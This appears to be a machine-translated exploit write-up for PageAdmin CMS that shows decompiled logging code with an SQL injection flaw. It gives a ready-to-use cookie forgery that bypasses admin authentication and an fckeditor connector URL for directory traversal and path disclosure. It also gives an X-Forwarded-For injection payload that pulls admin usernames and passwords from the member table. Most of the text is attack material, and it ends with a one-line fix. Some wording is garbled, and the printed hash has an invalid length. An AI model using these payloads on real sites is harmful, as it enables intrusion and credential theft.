PageAdmin CMS latest SQL Injection
PageAdmin CMS latest SQL Injection
The log saving function of the system does not filter IP addresses, leading to the SQL injection vulnerability.
// PageAdmin.Logpublic void Save(int SiteId, int IsMaster, string thetype, int state, string username, string description){string clientIP = this.GetClientIP();Conn conn = new Conn();string connectionString = conn.Constr();OleDbConnection oleDbConnection = new OleDbConnection(connectionString);oleDbConnection.Open();string cmdText = string.Concat(new object[]{"insert into pa_log([site_id],[task_id],[ismaster],[state],[thetype],[username],[url],[description],[ip],[thedate]) values(",SiteId,",0,",IsMaster,",",state,",'",this.f(thetype),"','",this.f(username),"','",HttpContext.Current.Request.RawUrl,"','",this.f(description),"','",clientIP,"','",DateTime.Now,"')"});OleDbCommand oleDbCommand = new OleDbCommand(cmdText, oleDbConnection);oleDbCommand.ExecuteNonQuery();oleDbConnection.Close();}// PageAdmin.Logprivate string GetClientIP(){string result;if (HttpContext.Current == null){result = "127.0.0.1";}else{HttpRequest request = HttpContext.Current.Request;string text = request.ServerVariables["HTTP_X_FORWARDED_FOR"];if (string.IsNullOrEmpty(text)){text = request.ServerVariables["REMOTE_ADDR"];}if (string.IsNullOrEmpty(text)){text = request.UserHostAddress;}result = text;}return result;}
It can be seen that the IP address is obtained from HTTP_X_FORWARDED_FOR and is directly inserted into the database without any filtering.
Because the injection method is used to report errors, the access Version cannot be injected, and the SQL SERVER does.
Most of the functions are called only when the website is modified. This function is called during background login.
Some websites have removed the background logon address. here we can use one method to find out the Directory Vulnerability in the fckeditor column. The vulnerability file is
/E/incs/fckeditor/editor/filemanager/connectors/aspx/connector. aspx
This is similar to the vulnerability in 2.x. Only the Cookie is detected and the code will not be pasted if it is too long.
It checks whether the Master exists, then checks whether the Master [UID] exists, and then queries the user table based on the UID. If the user is found, it checks whether the user is in the admin group. If yes, the user's last logon time corresponding to the UID is encrypted using her built-in Md5 function, which can be bypassed in the same way as Master [Valicate], but there is a problem here, if the UID does not exist, it will use an empty string "" to compare it with the Master [Valicate], so if we submit a UID that does not exist, use Md5 encryption "as the value of Master [Valicate] to bypass verification here.
The following aspx is used to calculate the encrypted string 17b62103fec08a1333215b141bb18217f11c8e13a.
<% @ Page language="c#"%><% @ Import NameSpace="System.Data"%><% @ Import NameSpace="System.Data.OleDb"%><% @ Import NameSpace="PageAdmin"%><script Language="C#" Runat="server">protected void Page_Load(Object sender,EventArgs e){Response.Write(new Md5().Get_Md5(""));}</script>
Finally, use Cookie: Master = 1 & UID = 9999 & Valicate = 17b62103fec08a1333215b141bb18217f11c8e13a to bypass.
Most fckeditor.net versions have the directory traversal vulnerability. You can set the current directory to d:/to view the files on disk d.
If you do not have the permission to view the root directory of the disk, you can change the current directory !, Let him report an error to know the website path.
Http://demo.pageadmin.net/e/incs/fckeditor/editor/filemanager/connectors/aspx/connector.aspx? Command = GetFoldersAndFiles & Type = File & CurrentFolder =!
In this way, you can find the website background path, log on to the background, and use burp to modify the X-Forwarded-For header For injection.
Set HTTP Header
X-Forwarded-For: 8.8.8.8 ', ''); select 1 from pa_member where (select top 1 username +': '+ userpassword from pa_member where m_group = 'admin')> 0 --
Then open the website background and log on to the website
Solution:
Use session